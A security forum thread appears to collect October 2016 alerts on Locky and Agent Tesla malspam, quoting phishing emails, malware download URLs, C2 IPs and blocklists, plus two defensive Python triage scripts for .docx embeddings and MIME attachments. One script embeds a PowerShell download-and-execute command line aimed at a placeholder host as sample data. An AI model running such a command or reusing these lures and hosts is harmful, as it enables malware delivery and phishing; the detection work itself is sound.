2016-10-27 - "... It looks like today's ransomware subject is 'Your Bill is Overdue'. But then again, don't bother blocking it. Block ZIP'ed visual basic scripts. This round of Locky makes blocking a tad harder by using 'application/octet-stream' as a Content-Type instead of 'application/zip'... I received just about 1,000 attachments like that, and about 4000 total..."

:fear::fear: :mad:
 
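Added example for the Dridex "embedded object" chain and the Trickbot macro-writes-a-.lnk chain quoted above. This is not code from the Payload Security write-up or from myonlinesecurity; it is a triage script of the kind you would run over a suspect .docx before detonating it. A .docx is a ZIP, an inserted object sits under word/embeddings/ as an OLE compound file, and the dropped shortcut inside it carries its command line as UTF-16LE, so the script lists those members, tags them by signature, looks for a shortcut header wrapped inside the OLE blob, and greps for the usual cmd/PowerShell/WScript launch strings. The sample document is constructed in memory (it is not a real Dridex file and the OLE blob is not a valid compound file, it only carries the signatures), and the URL in it is a placeholder.

```python
"""Triage a .docx for an embedded object that carries a Windows shortcut.

A .docx is a ZIP; an inserted object lives under word/embeddings/ as an
OLE compound file (oleObject1.bin).  This lists those members, tags each
by its leading bytes (OLE compound file, raw .lnk, other), looks for a
shortcut header wrapped inside the OLE blob, and greps the blob for the
usual cmd/PowerShell/WScript launch strings in both ASCII and UTF-16LE
(shortcut arguments are stored as UTF-16LE).  The sample document is
constructed in memory so this runs offline; it is not a real Dridex file.
"""
import io
import struct
import zipfile

OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"          # compound file header
# MS-SHLLINK: HeaderSize 0x4C followed by LinkCLSID 00021401-0000-0000-C000-000000000046
LNK_MAGIC = (b"\x4C\x00\x00\x00"
             b"\x01\x14\x02\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x46")
LAUNCH_HINTS = (b"powershell", b"cmd.exe", b"cmd /c", b"wscript", b"cscript", b"mshta")


def classify_blob(data: bytes) -> str:
    """Tag a blob by its signature: 'ole-compound', 'lnk' or 'other'."""
    if data.startswith(OLE_MAGIC):
        return "ole-compound"
    if data.startswith(LNK_MAGIC):
        return "lnk"
    return "other"


def launch_hints(data: bytes) -> list:
    """Return the launch strings present, checking ASCII and UTF-16LE forms."""
    low = data.lower()                      # bytes.lower() only touches ASCII letters
    found = []
    for hint in LAUNCH_HINTS:
        if hint in low or hint.decode().encode("utf-16-le") in low:
            found.append(hint.decode())
    return found


def triage_docx(docx_bytes: bytes) -> dict:
    """Map each word/embeddings/ member to its kind and the launch hints in it."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.startswith("word/embeddings/"):
                continue
            data = zf.read(name)
            kind = classify_blob(data)
            # A Package object wraps the dropped file in an Ole10Native stream;
            # a shortcut header inside the OLE blob is the tell for this chain.
            if kind == "ole-compound" and LNK_MAGIC in data:
                kind = "ole-wrapping-lnk"
            findings[name] = {"kind": kind, "hints": launch_hints(data)}
    return findings


def build_sample_docx() -> bytes:
    """Constructed sample: docx-shaped ZIP whose embedded object is an
    OLE-signature blob wrapping a .lnk header plus a UTF-16LE command line.
    The blob is not a valid compound file; it only carries the signatures."""
    args = ('cmd.exe /c powershell -w hidden -c "IEX (New-Object Net.WebClient)'
            ".DownloadString('http://example.invalid/p')\"")   # placeholder URL
    fake_lnk = LNK_MAGIC + b"\x00" * 56 + args.encode("utf-16-le")
    fake_ole = (OLE_MAGIC + b"\x00" * 504 + b"\x01Ole10Native\x00"
                + struct.pack("<I", len(fake_lnk)) + fake_lnk)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/media/image1.png", b"\x89PNG\r\n\x1a\n")
        zf.writestr("word/embeddings/oleObject1.bin", fake_ole)
    return buf.getvalue()


if __name__ == "__main__":
    for member, info in triage_docx(build_sample_docx()).items():
        print(member, info)
```

The substring search for the shortcut header is a triage heuristic: in a real oleObject1.bin the dropped file sits in the "\x01Ole10Native" stream and, for small files, may be split across mini-sectors, so for anything that matters parse the compound file properly (the olefile module does this) and carve the stream before looking for the .lnk header and its command line. Either way, an embedded object that contains a shortcut pointing at cmd or PowerShell is not something a billing document needs, and that, not the macro flag, is what to alert on for this delivery method.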
Fake 'Wrong tracking number', 'SureVoIP', 'electronic billing', 'BANK SLIP' SPAM

FYI...

Fake 'Wrong tracking number' SPAM - leads to Locky
- http://blog.dynamoo.com/2016/10/malware-spam-wrong-tracking-number.html
31 Oct 2016 - "This spam email leads to Locky ransomware:
From "Samuel Rodgers"
Date Mon, 31 Oct 2016 15:21:22 +0530
Subject Wrong tracking number
It looks like the delivery company gave us the wrong tracking number.
Please contact them as soon as possible and ask them regarding the shipment number 302856 information attached.


The name of the sender varies. Attached is a ZIP file named in a format similar to tracking_number_8b5b0ab.zip which in turn contains a malicious VBS script... named something like tracking number A99DB PDF.vbs... full list of download locations...
(Long list of domain-names at the dynamoo URL above.)
The malware phones home to:
91.107.107.241/linuxsucks .php [hostname: cfaer12.example .com] (Cloudpro LLC, Russia)
95.163.107.41/linuxsucks .php [hostname: shifu05 .ru] (JSC Digital Network, Russia)
146.120.89.98/linuxsucks .php (Ukrainian Internet Names Center aka ukrnames .com, Ukraine)
194.1.239.152/linuxsucks .php (Internet Hosting Ltd aka majorhost .net, Russia)
5.187.7.111/linuxsucks. php (Fornet Hosting, Spain)
Recommended blocklist:
5.187.7.111
91.107.107.241
95.163.107.41
146.120.89.98
194.1.239.152
"

- https://myonlinesecurity.co.uk/malspam-email-wrong-tracking-number-delivers-locky/
31 Oct 2016 - "... Locky downloader... an email with the subject of 'Wrong tracking number' coming as usual from random companies, names and email addresses with a semi-random named zip attachment starting with tracking_number_ containing a VBS file that pretends to be a PDF... similar to recent Locky malspam[1] where the download is an actual executable file, not an encrypted file needing decoding, although called a txt file. The VBS just renames it to the dll name...
1] https://myonlinesecurity.co.uk/please-review-malspam-delivers-locky-thor-version/

31 October 2016: tracking_number_aa587827b.zip: Extracts to: tracking number A1964B3 PDF.vbs
Current Virus total detections 6/55*. Payload Security** seems unable to get any payload from this vbs although manual analysis easily revealed the download locations:
http ://business-cambodia .com/he8wtc | http ://archilog .at/imwjmt | http ://badznaptak .pl/inlgm49
http ://aconetrick .com/6yoajl7 | http ://ficussalm .com/8pmjmwp
All these files are executable files and the VBS just renames them to a DLL and autoruns it (VirusTotal 14/57[3])...
One of the emails looks like:
From: Eldridge Beard <Beard.69896@ srimina .com>
Date: Mon 31/10/2016 09:05
Subject: Wrong tracking number
Attachment: tracking_number_aa587827b.zip
It looks like the delivery company gave us the wrong tracking number. Please contact them as soon as possible and ask them regarding the shipment number 302856 information attached.


The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...6e3ec12577eac9d6922ec06d/analysis/1477906017/

** https://www.hybrid-analysis.com/sam...9966e3ec12577eac9d6922ec06d?environmentId=100

3] https://www.virustotal.com/en/file/...bf56cd07de8ba42410c22940/analysis/1477908982/
___

Fake 'SureVoIP' SPAM - leads to Locky
- http://blog.dynamoo.com/2016/10/malware-spam-surevoip-voicemail-from.html
31 Oct 2016 - "This -fake- voicemail message leads to Locky ransomware:
Subject: Voicemail from Catalina rigby 02355270166 <02355270166> 00:01:22
From: SureVoIP (voicemailandfax@[redacted])
Date: Monday, 31 October 2016, 11:17
Message From "Catalina rigby 02355270166" 02355270166
Created: 2016.10.31 14:46:53 PM
Duration: 00:01:22
Account: voicemailandfax@ [redacted]


Details will vary from message to message. Attached is a ZIP file with a name similar to msg_252f-477a-6bd9-371f-330671579edb.zip which contains a malicious WSF script. My source tells me that the various scripts then download a component...
(Long list of domain-names at the dynamoo URL above.)
The C2 servers overlap with the ones found here.
91.107.107.241/linuxsucks .php [hostname: cfaer12.example .com] (Cloudpro LLC, Russia)
95.163.107.41/linuxsucks .php [hostname: shifu05 .ru] (JSC Digital Network, Russia)
146.120.89.98/linuxsucks .php (Ukrainian Internet Names Center aka ukrnames .com, Ukraine)
Recommended blocklist:
5.187.7.111
91.107.107.241
95.163.107.41
146.120.89.98
194.1.239.152
"
___

Fake 'electronic billing' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/malspam-email-thanks-for-using-electronic-billing-delivers-locky/
31 Oct 2016 - "... Locky downloader... an email with the subject of 'Document No 50319282' (random numbers) pretending to come from accounts @ your own email address with a semi-random named zip attachment starting with file containing a WSF file... One of the emails looks like:
From: NANNIE DONNELLY <accounts@ [redacted] .co.uk>
Date: Thu 01/09/2016 19:22
Subject: Document No 50319282
Attachment: File 50319282.zip
Thanks for using electronic billing
Please find your document attached
Regards
NANNIE DONNELLY


31 October 2016: File 50319282.zip: Extracts to: XY4918-1310.wsf - Current Virus total detections 10/55*
MALWR** shows a download of a file from
http ://www .shavash .ir/g7cberv?LoeMqQM=BQqhBkykpgn which is renamed by the script to hndYhViGx1.dll
(VirusTotal 8/56***). C2 are http ://95.163.107.41 /linuxsucks.php and http ://tdhyjfxltpj .pw/linuxsucks.php
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...5a23990639c6b90858adcc5c/analysis/1477916645/

** https://malwr.com/analysis/M2JiZTcwOWI2MjFlNDQ1NGEyYjUxODc2ZTdkYzEyMWU/
Hosts
136.243.80.209
146.120.89.98
91.107.107.241
95.163.107.41
192.42.116.41


*** https://www.virustotal.com/en/file/...57be1e0bbd169e04419c2326/analysis/1477926737/
___

Fake 'BANK SLIP' SPAM - delivers Tesla keylogger
- https://myonlinesecurity.co.uk/malspam-email-bank-slip-delivers-unknown-malware/
31 Oct 2016 - "... malware delivery email... an email with the subject of 'BANK SLIP' coming as usual from what looks like random companies, names and email addresses with a zip attachment that contains some unknown malware. VirusTotal only shows generic detections...
Update: I am being reliably informed that it is Agent Tesla keylogger* that sends info home to aqeel@ ubsrwp .pk . A recent similar attack but using malicious word docs with macros to deliver the payload is described HERE** with screenshots and a good description of the information...
* https://twitter.com/malwrhunterteam/status/793018062953938944

** https://www.zscaler.com/blogs/research/agent-tesla-keylogger-delivered-using-cybersquatting

31 October 2016: Bank Slip.zip: Extracts to: Bank Slip.exe - Current Virus total detections 9/57[3]
MALWR doesn’t show much [4]. | Payload Security[5]...
3] https://www.virustotal.com/en/file/...b185e0fce4f219286e1ef690/analysis/1477892702/

4] https://malwr.com/analysis/YzNhYzBhYmNkY2Q2NGQ3MDkzY2UyYzM5YTkxZDIxZGM/

5] https://www.hybrid-analysis.com/sam...c8bb185e0fce4f219286e1ef690?environmentId=100

One of the emails looks like:
From: wagagrove@ otbsporti.com
Date: Thu 01/09/2016 19:22
Subject: BANK SLIP
Attachment: Bank Slip.zip
Dear Sir,
Pleased be informed payment done as attached.
Regards,
Waga
Sales/Account Department
MOTOTECHNICA SOLUTION LTD.
GST NO : 0018898212965 ...


The basic rule is NEVER open any attachment to an email, unless you are expecting it..."

ubsrwp .pk: 198.24.190.35: https://www.virustotal.com/en/ip-address/198.24.190.35/information/

:fear::fear: :mad:
 
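Added example for the ISC advice in the previous post ("don't bother blocking the subject, block ZIP'ed visual basic scripts", and note the application/octet-stream Content-Type trick) and for the zipped .vbs/.wsf "PDF" lookalikes in the runs above. This is not code from the ISC diary or from the blogs quoted here; it is a mail-gateway style triage in Python that judges an attachment by its bytes rather than by the Content-Type the sender chose. For each attachment it sniffs the magic bytes (ZIP, PE, OLE, PDF), records a mismatch when a ZIP is declared as anything other than application/zip, and for ZIPs lists members whose extension is a Windows script-host or executable type or whose stem ends in "PDF". The message is constructed after the 'Wrong tracking number' sample, the addresses are placeholders and the .vbs inside is an inert one-line comment.

```python
"""Triage MIME attachments by content, not by the sender's declared type.

For every attachment this walks the message, sniffs the leading bytes
(ZIP, PE, OLE, PDF) regardless of the Content-Type header, notes when a
ZIP was declared as something else (application/octet-stream in the ISC
note), and for ZIPs lists members whose extension is a script-host or
executable type or whose stem pretends to be a PDF.  The message below is
constructed for the demo; addresses are placeholders and the .vbs is inert.
"""
import email
import io
import zipfile
from email import policy
from email.message import EmailMessage

MAGIC = {b"PK\x03\x04": "zip", b"MZ": "pe", b"\xD0\xCF\x11\xE0": "ole", b"%PDF": "pdf"}
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".hta", ".lnk",
               ".ps1", ".cmd", ".bat", ".exe", ".scr", ".pif", ".jar"}


def sniff(data: bytes) -> str:
    """Classify a blob by its magic bytes; 'unknown' when nothing matches."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return "unknown"


def suspicious_members(zip_bytes: bytes) -> list:
    """List ZIP members that look like a script/executable or a PDF lookalike."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            lower = info.filename.lower()
            stem, dot, ext = lower.rpartition(".")
            if not dot:
                stem, ext = lower, ""
            else:
                ext = "." + ext
            reasons = []
            if ext in SCRIPT_EXTS:
                reasons.append("script-or-executable:" + ext)
            # "tracking number A1964B3 PDF.vbs" style: the stem claims to be a PDF
            if stem.endswith((" pdf", ".pdf", "_pdf", "-pdf")):
                reasons.append("pdf-lookalike")
            if reasons:
                hits.append({"name": info.filename, "reasons": reasons})
    return hits


def triage_message(raw: bytes) -> list:
    """One record per attachment: declared vs sniffed type and ZIP findings."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    records = []
    for part in msg.iter_attachments():
        data = part.get_payload(decode=True) or b""
        declared = part.get_content_type()
        kind = sniff(data)
        members = suspicious_members(data) if kind == "zip" else []
        records.append({
            "filename": part.get_filename(),
            "declared": declared,
            "sniffed": kind,
            "mismatch": kind == "zip" and declared != "application/zip",
            "members": members,
            # block a bare executable outright, and any ZIP carrying a script/exe
            "block": kind == "pe" or bool(members),
        })
    return records


def build_sample_message() -> bytes:
    """Constructed sample modelled on the 'Wrong tracking number' run: a ZIP
    holding 'tracking number A1964B3 PDF.vbs', declared application/octet-stream.
    Addresses are placeholders; the script body is an inert comment."""
    zbuf = io.BytesIO()
    with zipfile.ZipFile(zbuf, "w") as zf:
        zf.writestr("tracking number A1964B3 PDF.vbs",
                    "' constructed placeholder, not the real downloader\r\n")
    msg = EmailMessage()
    msg["From"] = "Eldridge Beard <Beard.69896@example.invalid>"
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "Wrong tracking number"
    msg.set_content("It looks like the delivery company gave us the wrong tracking number.")
    msg.add_attachment(zbuf.getvalue(), maintype="application", subtype="octet-stream",
                       filename="tracking_number_aa587827b.zip")
    return msg.as_bytes()


if __name__ == "__main__":
    for rec in triage_message(build_sample_message()):
        print(rec)
```

The point of sniffing is that a ZIP is a ZIP whatever the MIME header says, so a rule keyed on Content-Type: application/zip is bypassed by exactly the octet-stream trick ISC describes, while a rule keyed on the PK header plus a member list is not. The member check also catches the "... PDF.vbs" naming in these runs that relies on Explorer hiding the real extension. Password-protected ZIPs still list their member names, so the extension check works there too; nested archives would need the same check applied recursively.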